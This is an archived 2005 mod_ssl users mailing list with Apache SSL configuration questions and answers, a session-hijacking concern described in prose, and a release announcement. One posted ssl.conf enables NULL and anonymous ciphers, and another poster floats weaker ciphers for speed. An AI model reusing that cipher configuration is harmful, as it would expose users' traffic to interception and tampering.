	 <002201c5c2ae$e8120400$02fea8c0@desktop>
	 <4338194E.7070306@w3works.com>
	 
	 <03db01c5d099$655a2f30$02fea8c0@desktop>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 10/14/05, Pigeon  wrote:
> I am helping someone develop a product, and for the next little bit he wi=
ll
> need to access port 443 with out the communication being encrypted (aka h=
e
> could telnet to it if he wanted).
>
> But in the very near future, he will want to make 443 encrypted..
>
> Is it possible to not force encryption on port443?

Sure... you just tell Apache to listen on that port and don't turn the
SSLEngine on.  :)

Or are you asking how to make it *optional*?  You can do that too --
as long as "SSLRequireSSL" isn't set, it should work.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 14 13:38:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 088E114D876; Fri, 14 Oct 2005 13:38:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.206])
	by master.modssl.org (Postfix) with ESMTP id A30BF14D867
	for ; Fri, 14 Oct 2005 13:38:49 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h31so449157wxd
        for ; Fri, 14 Oct 2005 04:38:48 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=AqnhHpTGVw01qAMQ+V1me1uhqUPohfkXr4O6seEwFpiAgZ58ZeVQOq6VHNawZNpoTcNiTq/9ZFA3vN+nr6g1cgF5SnvJpuUqqjiZWOGzqzBdz8GuNwf/imI5SHANaO8450WaPdTZ86NklJC88c5b8YursAvC5sxgFRh6pOktVDo=
Received: by 10.70.108.14 with SMTP id g14mr1155175wxc;
        Fri, 14 Oct 2005 04:38:48 -0700 (PDT)
Received: by 10.70.73.11 with HTTP; Fri, 14 Oct 2005 04:38:48 -0700 (PDT)
Message-ID: 
Date: Fri, 14 Oct 2005 07:38:48 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Fwd: How to allow only certain Certificates
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <200510120839.05409.harry@knitter-edv-beratung.de>
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Helps if I send this from the address that is actually subscribed to the li=
st...

resending

---------- Forwarded message ----------
From: Cliff Woolley
Date: Oct 12, 2005 7:41 AM
Subject: Re: How to allow only certain Certificates
To: modssl-users@modssl.org


On 10/12/05, Dr. Harry Knitter  wrote:
> how can I restrict access to my Apache to owners of certain individual
> certificates?

Sounds like a good case for FakeBasicAuth combined with Require User.

http://httpd.apache.org/docs/2.0/mod/mod_ssl.html#ssloptions

Hope this helps,
Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 14 14:58:18 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4FB0914D872; Fri, 14 Oct 2005 14:58:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natsmtp00.rzone.de (natsmtp00.rzone.de [81.169.145.165])
	by master.modssl.org (Postfix) with ESMTP id 21F7A14D82B
	for ; Fri, 14 Oct 2005 14:58:17 +0200 (CEST)
Received: from bitgully.knitter.privat (p54934003.dip.t-dialin.net [84.147.64.3])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j9ECwGug028839
	for ; Fri, 14 Oct 2005 14:58:16 +0200 (MEST)
Received: by bitgully.knitter.privat (Postfix, from userid 65534)
	id 140C76554A; Fri, 14 Oct 2005 14:58:26 +0200 (CEST)
Received: from notebook.knitter.privat (notebook.KNITTER.PRIVAT [192.168.0.246])
	by bitgully.knitter.privat (Postfix) with ESMTP id 9BE4B65500
	for ; Fri, 14 Oct 2005 14:58:25 +0200 (CEST)
From: "Dr. Harry Knitter" 
To: modssl-users@modssl.org
Subject: Re: Fwd: How to allow only certain Certificates
Date: Fri, 14 Oct 2005 14:58:14 +0200
User-Agent: KMail/1.8.2
References: <200510120839.05409.harry@knitter-edv-beratung.de>  
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200510141458.14514.harry@knitter-edv-beratung.de>
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on 
	bitgully.knitter.privat
X-Spam-Level: 
X-Spam-Status: No, score=-4.5 required=4.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=failed version=3.0.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dr. Harry Knitter" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Am Freitag, 14. Oktober 2005 13:38 schrieb Cliff Woolley:
> Helps if I send this from the address that is actually subscribed to the
> list...
>
> resending
>
> ---------- Forwarded message ----------
> From: Cliff Woolley
> Date: Oct 12, 2005 7:41 AM
> Subject: Re: How to allow only certain Certificates
> To: modssl-users@modssl.org
>
> On 10/12/05, Dr. Harry Knitter  wrote:
> > how can I restrict access to my Apache to owners of certain individual
> > certificates?
>
> Sounds like a good case for FakeBasicAuth combined with Require User.
>
> http://httpd.apache.org/docs/2.0/mod/mod_ssl.html#ssloptions
>
> Hope this helps,
> Cliff


Thanks, however, I=B4d prefer something like the Unique Subject Identifyer =
or=20
perhaps the Fingerprints. DNs can be faked easy.

Harry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 14 16:08:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0E73B14D872; Fri, 14 Oct 2005 16:08:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.199])
	by master.modssl.org (Postfix) with ESMTP id 89CFE14D82B
	for ; Fri, 14 Oct 2005 16:08:48 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h31so468315wxd
        for ; Fri, 14 Oct 2005 07:08:47 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=ZTUmoX+16J3qipLbeUkrSV15FAIe2wuD5JwhBOlfDLBf1nV+q9vYEJQaYTvdKWi6xOOQHLe4awZUkbj+7uc6bmsZKQ1DAAG+1JgCReBC7Kz1sgXF4vUMTLpnTtBUH0JfmejiB4fKTof7LDjU6UEYIOg0QX5HV1KhkPe62oqkZ8I=
Received: by 10.70.89.8 with SMTP id m8mr1206341wxb;
        Fri, 14 Oct 2005 07:08:47 -0700 (PDT)
Received: by 10.70.73.11 with HTTP; Fri, 14 Oct 2005 07:08:47 -0700 (PDT)
Message-ID: 
Date: Fri, 14 Oct 2005 10:08:47 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: Fwd: How to allow only certain Certificates
In-Reply-To: <200510141458.14514.harry@knitter-edv-beratung.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <200510120839.05409.harry@knitter-edv-beratung.de>
	 
	 
	 <200510141458.14514.harry@knitter-edv-beratung.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 10/14/05, Dr. Harry Knitter  wrote:

> Thanks, however, I=B4d prefer something like the Unique Subject Identifye=
r or
> perhaps the Fingerprints. DNs can be faked easy.

Not if you require your own CA as the issuing authority using
SSLCACertificateFile and SSLRequire, they can't...

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 15 12:42:09 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7EAD114D876; Sat, 15 Oct 2005 12:42:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf40.cluster1.charter.net (mxsf40.cluster1.charter.net [209.225.28.172])
	by master.modssl.org (Postfix) with ESMTP id BEBF714D83F
	for ; Sat, 15 Oct 2005 12:42:08 +0200 (CEST)
Received: from mxip09a.cluster1.charter.net (mxip09a.cluster1.charter.net [209.225.28.139])
	by mxsf40.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j9FAg4Q9004037
	for ; Sat, 15 Oct 2005 06:42:04 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) ([68.117.211.186])
  by mxip09a.cluster1.charter.net with SMTP; 15 Oct 2005 06:42:04 -0400
X-IronPort-AV: i="3.97,216,1125892800"; 
   d="scan'208"; a="1501273539:sNHT24262568"
Message-ID: <000a01c5d175$174edbb0$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> <4338194E.7070306@w3works.com>  <03db01c5d099$655a2f30$02fea8c0@desktop> 
Subject: Re: Is it possible to not force SSL on port:443?
Date: Sat, 15 Oct 2005 06:42:07 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Also, here is my ssl.conf:
---------------------------------
LoadModule ssl_module modules/mod_ssl.so

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin

SSLSessionCache         shmcb:/var/cache/mod_ssl/scache(512000)
SSLSessionCacheTimeout  300

SSLMutex default

SSLCryptoDevice builtin

SSLProtocol +All
SSLCipherSuite HIGH:MEDIUM:+SHA1:+NULL:+aNULL:+eNULL

SSLRandomSeed startup file:/dev/urandom 1024
SSLRandomSeed connect file:/dev/urandom 1024

SSLProxyEngine off
-----------------------------------

Then I setup my vhost like:


    DocumentRoot /var/www/websitename/
    ServerName websitename
    ErrorLog /var/log/httpd/websitename-ssl-error.log
    CustomLog /var/log/httpd/websitename-ssl-access.log common
    sslengine on
    sslcertificatefile /etc/httpd/ssl/websitename/websitename.crt
    sslcertificatekeyfile /etc/httpd/ssl/websitename/websitename.key


Right now I am using sslengine off and doing none encryption over 443, but I 
really need to make encryption optional on the same port.

Any ideas?


----- Original Message ----- 
From: "Cliff Woolley" 
To: 
Sent: Friday, October 14, 2005 7:36 AM
Subject: Re: Is it possible to not force SSL on port:443?


On 10/14/05, Pigeon  wrote:
> I am helping someone develop a product, and for the next little bit he 
> will
> need to access port 443 with out the communication being encrypted (aka he
> could telnet to it if he wanted).
>
> But in the very near future, he will want to make 443 encrypted..
>
> Is it possible to not force encryption on port443?

Sure... you just tell Apache to listen on that port and don't turn the
SSLEngine on.  :)

Or are you asking how to make it *optional*?  You can do that too --
as long as "SSLRequireSSL" isn't set, it should work.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 18 08:39:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AA5A614D884; Tue, 18 Oct 2005 08:39:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id 72E5614D832;
	Tue, 18 Oct 2005 08:39:51 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id E18E31B4488F; Tue, 18 Oct 2005 08:39:50 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9ECA3A17DD; Tue, 18 Oct 2005 08:39:39 +0200 (CEST)
Date: Tue, 18 Oct 2005 08:39:39 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.25-1.3.34 for Apache 1.3.34
Message-ID: <20051018063939.GA81360@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.11 OpenPKG/CURRENT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache 1.3.34 was released, so I've upgraded mod_ssl to apply cleanly to
this Apache version. No other changes. Fetch mod_ssl 2.8.25-1.3.34 from
the usual locations:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 18 12:28:32 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E4F9414D852; Tue, 18 Oct 2005 12:28:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.contium.pl (smtp.contium.pl [193.178.214.13])
	by master.modssl.org (Postfix) with ESMTP id 7352614D832
	for ; Tue, 18 Oct 2005 12:28:32 +0200 (CEST)
Received: (qmail 20422 invoked by uid 89); 18 Oct 2005 10:28:31 -0000
Received: from unknown (HELO localhost) (127.0.0.1)
  by 0 with SMTP; 18 Oct 2005 10:28:31 -0000
Received: from unknown ([127.10.10.10])
 by localhost (zinc [127.10.10.10]) (amavisd-new, port 628) id 15297-225
 for ; Tue, 18 Oct 2005 12:28:31 +0200 (CEST)
Received: from unknown (HELO siaco.contium.pl) (193.178.214.124)
  by 0 with SMTP; 18 Oct 2005 10:28:31 -0000
Received: (qmail 8796 invoked by uid 1000); 18 Oct 2005 10:28:31 -0000
Date: Tue, 18 Oct 2005 12:28:31 +0200
From: Ryszard Lach 
To: modssl-users@modssl.org
Subject: Why is SSL_SESSION_ID changing?
Message-ID: <20051018102831.GG5229@autograf.pl>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline
User-Agent: Mutt/1.5.11
X-Virus-Scanned: by CONTIUM Antivirus System
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ryszard Lach 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi.
We are developing a java-based webapp, a kind of CMS. The problem is,
that relatively big group of it's users will have rights to create
pages, upload files etc., also upload javascript pages. In this case an
attacker will be able to steal somebody's session (e.g. creating JS page
which will read JSESSIONID cookie and forward it to it's author).

We thought, that one of possible solutions will be binding user's
session to SSL_SESSION_ID (i.e. keeping SSL_SESSION_ID in user's session
and comparing it at every request with ID read from this request).

The problem is, that SSL_SESSION_ID is changing regardles of
SSLSessionCacheTimeout (we've set it to very high value). I suppose that
it's not caused by server (mod_ssl after writing SESSION_ID to cache is
able to get it back everytime, 100% hit rate).

Is there any reason for which the ssl sessions are renegotiated
(sometimes even three times during one minute)? Is it possible to block
such a renegotiations at server/application side, or it is very
browser-dependent?

T.I.A.

R.

-- 
"First they ignore you. Then they laugh at you. Then they
fight you. Then you win." - Mohandas Gandhi.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 18 12:38:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1F56D14D852; Tue, 18 Oct 2005 12:38:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id D995314D832
	for ; Tue, 18 Oct 2005 12:38:53 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id DBA183A720
	for ; Tue, 18 Oct 2005 12:56:58 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 04037-02 for ;
 Tue, 18 Oct 2005 12:56:54 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 3060DA6EB8; Tue, 18 Oct 2005 12:56:54 +0200 (CEST)
Date: Tue, 18 Oct 2005 12:56:54 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Why is SSL_SESSION_ID changing?
Message-ID: <20051018105654.GM28059@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <20051018102831.GG5229@autograf.pl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20051018102831.GG5229@autograf.pl>
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Oct 18, 2005 at 12:28:31PM +0200, Ryszard Lach wrote:
> We thought, that one of possible solutions will be binding user's
> session to SSL_SESSION_ID (i.e. keeping SSL_SESSION_ID in user's session
> and comparing it at every request with ID read from this request).
> 
Don't - SSL_SESSION_ID isn't useable for longer lifetime sessions.

> The problem is, that SSL_SESSION_ID is changing regardles of
> SSLSessionCacheTimeout (we've set it to very high value). I suppose that
> it's not caused by server (mod_ssl after writing SESSION_ID to cache is
> able to get it back everytime, 100% hit rate).
> 
> Is there any reason for which the ssl sessions are renegotiated
> (sometimes even three times during one minute)? Is it possible to block
> such a renegotiations at server/application side, or it is very
> browser-dependent?
> 
Lifetime can't be forced from the serverside, all you can do is set an
upper bound on it. The client may very well choose to cut the session
earlier. I've seen clients that let sessions live longer with a higher
level of security on the session - but it still isn't a good choice.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 19 21:54:55 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 27CF414D870; Wed, 19 Oct 2005 21:54:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from zproxy.gmail.com (zproxy.gmail.com [64.233.162.207])
	by master.modssl.org (Postfix) with ESMTP id B5E0A14D867
	for ; Wed, 19 Oct 2005 21:54:53 +0200 (CEST)
Received: by zproxy.gmail.com with SMTP id i11so11736nzi
        for ; Wed, 19 Oct 2005 12:54:53 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=DNuisnSprtJCpDhZPwTMHuyJOzyH2LzB+APRwep8BZIojaNVURaK9jIn84dQVnDV5mFvK+2Bor+olqIj4GJfPNsA8Y66UV11Yfn74wGVI54VCKFwbKBv5JHT4FBQFTuMx/57wf6cCzrp592ajpnhD50evOHlgA9h2+sViKbAvqA=
Received: by 10.37.18.45 with SMTP id v45mr1019794nzi;
        Wed, 19 Oct 2005 12:54:53 -0700 (PDT)
Received: by 10.36.82.4 with HTTP; Wed, 19 Oct 2005 12:54:52 -0700 (PDT)
Message-ID: 
Date: Wed, 19 Oct 2005 15:54:52 -0400
From: Jeff Ambrosino 
To: modssl-users@modssl.org
Subject: reduce handshake overhead in a reverse mod_proxy (SSL front-end + SSL back-end)
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Ambrosino 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We use mod_proxy and mod_ssl in a reverse proxy configuration; traffic
is accepted by the proxy through SSL, and then proxied backwards to
another server over SSL.  Unfortunately, for application reasons, we
*must* proxy backwards via SSL, even through the proxy and the
back-end web server are located on the same rack (!)

My question is:  are there any ways we can tune our configuration to
reduce SSL handshake overhead when connecting to the back-end web
server?  Perhaps constraining the available ciphers to weaker ones
through SSLProxyCipherSuite?  (I'm not sure if the SSLProxy*
directives affect the front-end and/or back-end of mod_proxy...) Note
that we don't have alot of control over the back-end web server
config, so I'm looking for software/config suggestions we can implement on
the proxy side.

thanks,
JB
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 19 23:32:23 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 673FA14D867; Wed, 19 Oct 2005 23:32:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from zproxy.gmail.com (zproxy.gmail.com [64.233.162.199])
	by master.modssl.org (Postfix) with ESMTP id 691CF14D841
	for ; Wed, 19 Oct 2005 23:32:20 +0200 (CEST)
Received: by zproxy.gmail.com with SMTP id i11so25521nzi
        for ; Wed, 19 Oct 2005 14:32:19 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=mJWQKUzL/siUuDJeVx+vZhE/Yd5UMAm1Knekq+L/MCxO7m0LOd5c/IK3ucvJTml0Bqq/CWwgC+POT/ma2RclxYmFdhFd9cr2Y0Wf3kbiEJ2K3CcnGf38Tu8oMIzSAsDvmw9oo31YXNPLiSbKoAO+mv0WZXRLWT4jiODPR7O2rG8=
Received: by 10.36.252.77 with SMTP id z77mr1069841nzh;
        Wed, 19 Oct 2005 14:32:19 -0700 (PDT)
Received: by 10.36.82.4 with HTTP; Wed, 19 Oct 2005 14:32:19 -0700 (PDT)
Message-ID: 
Date: Wed, 19 Oct 2005 17:32:19 -0400
From: Jeff Ambrosino 
To: Georg Oppenberg 
Subject: Re: reduce handshake overhead in a reverse mod_proxy (SSL front-end + SSL back-end)
Cc: modssl-users@modssl.org
In-Reply-To: <4356b695.21497a42.2255.7ab9SMTPIN_ADDED@mx.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 <4356b695.21497a42.2255.7ab9SMTPIN_ADDED@mx.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Ambrosino 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Georg,

after I emailed the list, I found this info:

http://www.covalent.net/resource/documentation/faststart/2.0.0/userguide/ht=
ml/sslconfigure.php#1176550

It appears that the Apache/mod_ssl "SSLProxyProtocol" directive lets
you limit the ciphers that the proxy will use (as a client) to the
back-end server.  I also found the following research report, which
talks about performance of SSL protocol and various ciphers:

http://www.cs.ucr.edu/~bhuyan/papers/ssl.pdf

I'll continue to work on this and report back to the list if/when I
find something conclusive. In the meantime, if anyone on the mod_ssl
list has further suggestions, I'm all ears :)

thanks
JB


On 10/19/05, Georg Oppenberg  wrote:
> Hi,
>
> by chance I stumbled over the same problem here today. I'm very
> interested in answers you receive. Maybe you can write some sort of
> summary for the mailing list.
[...]
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 20 17:30:19 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CCC5414D851; Thu, 20 Oct 2005 17:30:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web42409.mail.yahoo.com (web42409.mail.yahoo.com [66.218.93.232])
	by master.modssl.org (Postfix) with SMTP id 16F9914D842
	for ; Thu, 20 Oct 2005 17:30:18 +0200 (CEST)
Received: (qmail 89464 invoked by uid 60001); 20 Oct 2005 15:30:16 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=4tnkPQFo5uF3pUKgkLjklgECbB3VXbAKI7E0pOfGFZsDerFYUW6kTDcavbzeUxbi4R47bc3aTL83IlYYc4C+W6NOsJA5u22XyihjRMqYQ4ZibL+E+xULFBZq0Gp3U9+iFFk28oBBHEYH/fn0k/Z8CaIsE03BFXruBzI/7qP8slc=  ;
Message-ID: <20051020153016.89462.qmail@web42409.mail.yahoo.com>
Received: from [62.129.121.62] by web42409.mail.yahoo.com via HTTP; Thu, 20 Oct 2005 08:30:16 PDT
Date: Thu, 20 Oct 2005 08:30:16 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: reduce handshake overhead in a reverse mod_proxy (SSL front-end + SSL back-end)
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You could possibly use stunnel to set up a persistent
ssl connection. Connecting up to a local port with
just http (only listen on localhost). I believe the
sessions are reused with stunnel. It's extra config
but quick to setup.

Regards
Matt

--- Jeff Ambrosino  wrote:

> Hi Georg,
> 
> after I emailed the list, I found this info:
> 
>
http://www.covalent.net/resource/documentation/faststart/2.0.0/userguide/html/sslconfigure.php#1176550
> 
> It appears that the Apache/mod_ssl
> "SSLProxyProtocol" directive lets
> you limit the ciphers that the proxy will use (as a
> client) to the
> back-end server.  I also found the following
> research report, which
> talks about performance of SSL protocol and various
> ciphers:
> 
> http://www.cs.ucr.edu/~bhuyan/papers/ssl.pdf
> 
> I'll continue to work on this and report back to the
> list if/when I
> find something conclusive. In the meantime, if
> anyone on the mod_ssl
> list has further suggestions, I'm all ears :)
> 
> thanks
> JB
> 
> 
> On 10/19/05, Georg Oppenberg
>  wrote:
> > Hi,
> >
> > by chance I stumbled over the same problem here
> today. I'm very
> > interested in answers you receive. Maybe you can
> write some sort of
> > summary for the mailing list.
> [...]
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
__________________________________ 
Yahoo! Music Unlimited 
Access over 1 million songs. Try it free.
http://music.yahoo.com/unlimited/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
